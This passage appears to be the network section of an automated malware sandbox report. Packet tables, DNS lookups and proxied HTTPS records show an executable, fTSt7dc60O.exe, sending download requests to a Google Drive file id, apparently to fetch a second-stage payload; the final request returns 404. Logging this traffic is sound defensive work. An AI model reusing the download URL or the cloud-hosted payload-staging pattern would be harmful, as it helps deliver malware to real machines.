                                                        Jan 10, 2025 15:47:57.045248032 CET49990443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:47:57.045273066 CET44349990142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:07.068800926 CET49991443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:07.068855047 CET44349991216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:07.068955898 CET49991443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:07.069340944 CET49991443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:07.069350004 CET44349991216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:07.706455946 CET44349991216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:07.706588030 CET49991443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:07.707262039 CET44349991216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:07.707349062 CET49991443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:07.709188938 CET49991443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:07.709197044 CET44349991216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:07.709469080 CET44349991216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:07.709518909 CET49991443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:07.709919930 CET49991443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:07.751336098 CET44349991216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:08.095485926 CET44349991216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:08.095604897 CET49991443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:08.095618010 CET44349991216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:08.095666885 CET49991443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:08.095844030 CET49991443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:08.095868111 CET44349991216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:08.095921040 CET49991443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:08.111413956 CET49992443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:08.111459970 CET44349992142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:08.111881971 CET49992443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:08.111881971 CET49992443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:08.111913919 CET44349992142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:08.753988028 CET44349992142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:08.754106045 CET49992443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:08.754709959 CET49992443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:08.754718065 CET44349992142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:08.754961014 CET49992443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:08.754966021 CET44349992142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:09.208004951 CET44349992142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:09.208048105 CET44349992142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:09.208136082 CET49992443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:09.208151102 CET44349992142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:09.208199024 CET49992443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:09.208244085 CET49992443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:09.209291935 CET44349992142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:09.209342003 CET44349992142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:09.209355116 CET49992443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:09.209388971 CET49992443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:09.212348938 CET49992443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:09.212366104 CET44349992142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:19.240591049 CET49993443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:19.240637064 CET44349993216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:19.240741014 CET49993443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:19.241283894 CET49993443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:19.241296053 CET44349993216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:19.888999939 CET44349993216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:19.889084101 CET49993443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:19.889791012 CET44349993216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:19.889851093 CET49993443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:19.891752005 CET49993443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:19.891766071 CET44349993216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:19.892035007 CET44349993216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:19.892091036 CET49993443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:19.892530918 CET49993443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:19.935329914 CET44349993216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:20.300555944 CET44349993216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:20.300713062 CET49993443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:20.300977945 CET49993443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:20.301040888 CET44349993216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:20.301132917 CET49993443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:20.311182976 CET49994443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:20.311230898 CET44349994142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:20.311404943 CET49994443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:20.311665058 CET49994443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:20.311681032 CET44349994142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:20.954351902 CET44349994142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:20.954602957 CET49994443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:20.955296040 CET49994443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:20.955307961 CET44349994142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:20.955507040 CET49994443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:20.955512047 CET44349994142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:21.305252075 CET44349994142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:21.305341005 CET44349994142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:21.305403948 CET44349994142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:21.305484056 CET49994443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:21.305484056 CET49994443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:21.305484056 CET49994443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:21.306358099 CET49994443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:21.306375027 CET44349994142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:31.334811926 CET49995443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:31.334923983 CET44349995216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:31.335042000 CET49995443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:31.335486889 CET49995443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:31.335536003 CET44349995216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:31.982891083 CET44349995216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:31.983056068 CET49995443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:31.983876944 CET44349995216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:31.983954906 CET49995443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:31.986542940 CET49995443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:31.986558914 CET44349995216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:31.986996889 CET44349995216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:31.987051010 CET49995443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:31.987562895 CET49995443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:32.031339884 CET44349995216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:32.361990929 CET44349995216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:32.362158060 CET49995443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:32.362194061 CET44349995216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:32.362242937 CET49995443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:32.362390041 CET49995443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:32.362425089 CET44349995216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:32.362478018 CET49995443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:32.373231888 CET49996443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:32.373274088 CET44349996142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:32.373346090 CET49996443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:32.373717070 CET49996443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:32.373728037 CET44349996142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:33.036530018 CET44349996142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:33.036695004 CET49996443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:33.037420988 CET49996443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:33.037435055 CET44349996142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:33.037645102 CET49996443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:33.037652016 CET44349996142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:33.466063023 CET44349996142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:33.466125011 CET44349996142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:33.466129065 CET49996443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:33.466151953 CET44349996142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:33.466195107 CET49996443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:33.466212988 CET49996443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:33.467226028 CET49996443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:33.467278004 CET44349996142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:33.467344999 CET49996443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:43.506472111 CET49997443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:43.506514072 CET44349997216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:43.506772995 CET49997443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:43.507054090 CET49997443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:43.507064104 CET44349997216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:44.163527012 CET44349997216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:44.163716078 CET49997443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:44.164333105 CET44349997216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:44.164423943 CET49997443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:44.166028023 CET49997443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:44.166037083 CET44349997216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:44.166323900 CET44349997216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:44.166382074 CET49997443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:44.166709900 CET49997443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:44.207343102 CET44349997216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:44.546782970 CET44349997216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:44.546849012 CET49997443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:44.546865940 CET44349997216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:44.546910048 CET49997443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:44.547394037 CET44349997216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:44.547435045 CET44349997216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:44.547435045 CET49997443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:44.547492027 CET49997443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:44.577986956 CET49997443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:44.578015089 CET44349997216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:44.747694969 CET49998443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:44.747741938 CET44349998142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:44.747816086 CET49998443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:44.748586893 CET49998443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:44.748600960 CET44349998142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:45.397917032 CET44349998142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:45.398009062 CET49998443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:45.401253939 CET49998443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:45.401268959 CET44349998142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:45.401549101 CET44349998142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:45.401617050 CET49998443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:45.402045012 CET49998443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:45.443340063 CET44349998142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:45.830495119 CET44349998142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:45.830580950 CET44349998142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:45.830652952 CET49998443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:45.830666065 CET44349998142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:45.830749989 CET49998443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:45.832000971 CET49998443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:45.832019091 CET44349998142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:55.865823030 CET49999443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:55.865885973 CET44349999216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:55.865974903 CET49999443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:55.866406918 CET49999443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:55.866419077 CET44349999216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:56.504791021 CET44349999216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:56.504916906 CET49999443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:56.505672932 CET49999443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:56.505678892 CET44349999216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:56.505870104 CET49999443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:56.505875111 CET44349999216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:56.989281893 CET44349999216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:56.989649057 CET49999443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:56.989649057 CET49999443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:56.989692926 CET44349999216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:48:56.989765882 CET49999443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:48:57.002202988 CET50000443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:57.002230883 CET44350000142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:57.002304077 CET50000443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:57.002569914 CET50000443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:57.002578020 CET44350000142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:57.671003103 CET44350000142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:57.671144962 CET50000443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:57.671853065 CET50000443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:57.671859980 CET44350000142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:57.671986103 CET50000443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:57.671991110 CET44350000142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:58.150053024 CET44350000142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:58.150110006 CET44350000142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:58.150170088 CET44350000142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:48:58.150340080 CET50000443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:58.150340080 CET50000443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:58.150340080 CET50000443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:58.151561022 CET50000443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:48:58.151576042 CET44350000142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:08.193938017 CET50001443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:08.193984032 CET44350001216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:08.194122076 CET50001443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:08.194475889 CET50001443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:08.194485903 CET44350001216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:08.854505062 CET44350001216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:08.855299950 CET44350001216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:08.855339050 CET50001443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:08.855359077 CET44350001216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:08.855374098 CET50001443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:08.855726004 CET50001443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:08.857563972 CET50001443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:08.857569933 CET44350001216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:08.857887983 CET44350001216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:08.858031034 CET50001443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:08.858398914 CET50001443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:08.903326035 CET44350001216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:09.245707989 CET44350001216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:09.245780945 CET44350001216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:09.245876074 CET50001443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:09.245898962 CET50001443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:09.246131897 CET50001443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:09.246150017 CET44350001216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:09.255104065 CET50002443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:09.255139112 CET44350002142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:09.255242109 CET50002443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:09.255511999 CET50002443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:09.255522013 CET44350002142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:10.017839909 CET44350002142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:10.018106937 CET50002443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:10.023118973 CET50002443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:10.023139000 CET44350002142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:10.023349047 CET50002443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:10.023355961 CET44350002142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:10.451025963 CET44350002142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:10.451105118 CET44350002142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:10.451172113 CET44350002142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:10.451292038 CET50002443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:10.451292038 CET50002443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:10.451292038 CET50002443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:10.531364918 CET50002443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:10.531400919 CET44350002142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:20.724932909 CET50003443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:20.724989891 CET44350003216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:20.725068092 CET50003443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:20.725528955 CET50003443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:20.725539923 CET44350003216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:21.410959005 CET44350003216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:21.411175013 CET50003443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:21.411658049 CET50003443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:21.411670923 CET44350003216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:21.411870003 CET50003443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:21.411875010 CET44350003216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:21.846330881 CET44350003216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:21.846597910 CET50003443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:21.846677065 CET50003443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:21.846714973 CET44350003216.58.206.78192.168.2.10
                                                        Jan 10, 2025 15:49:21.846784115 CET50003443192.168.2.10216.58.206.78
                                                        Jan 10, 2025 15:49:21.854310989 CET50004443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:21.854355097 CET44350004142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:21.854430914 CET50004443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:21.854679108 CET50004443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:21.854693890 CET44350004142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:22.511236906 CET44350004142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:22.511413097 CET50004443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:22.511919022 CET50004443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:22.511928082 CET44350004142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:22.512113094 CET50004443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:22.512119055 CET44350004142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:22.993359089 CET44350004142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:22.993400097 CET44350004142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:22.993474960 CET50004443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:22.993493080 CET44350004142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:22.993537903 CET50004443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:23.007167101 CET44350004142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:23.007213116 CET44350004142.250.185.97192.168.2.10
                                                        Jan 10, 2025 15:49:23.007217884 CET50004443192.168.2.10142.250.185.97
                                                        Jan 10, 2025 15:49:23.007252932 CET50004443192.168.2.10142.250.185.97

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 10, 2025 15:46:41.669152021 CET5529853192.168.2.101.1.1.1
                                                        Jan 10, 2025 15:46:41.676033974 CET53552981.1.1.1192.168.2.10
                                                        Jan 10, 2025 15:46:42.786801100 CET4982153192.168.2.101.1.1.1
                                                        Jan 10, 2025 15:46:42.793451071 CET53498211.1.1.1192.168.2.10

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jan 10, 2025 15:46:41.669152021 CET192.168.2.101.1.1.10x3a7eStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                        Jan 10, 2025 15:46:42.786801100 CET192.168.2.101.1.1.10x9aStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 10, 2025 15:46:41.676033974 CET1.1.1.1192.168.2.100x3a7eNo error (0)drive.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                        Jan 10, 2025 15:46:42.793451071 CET1.1.1.1192.168.2.100x9aNo error (0)drive.usercontent.google.com142.250.185.97A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • drive.google.com
                                                        • drive.usercontent.google.com

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.1049842216.58.206.784438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:46:42 UTC216OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        2025-01-10 14:46:42 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:46:42 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-ogCCWjANUjI6_xlxfulEug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.1049853142.250.185.974438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:46:43 UTC258OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        2025-01-10 14:46:43 UTC2229INHTTP/1.1 404 Not Found
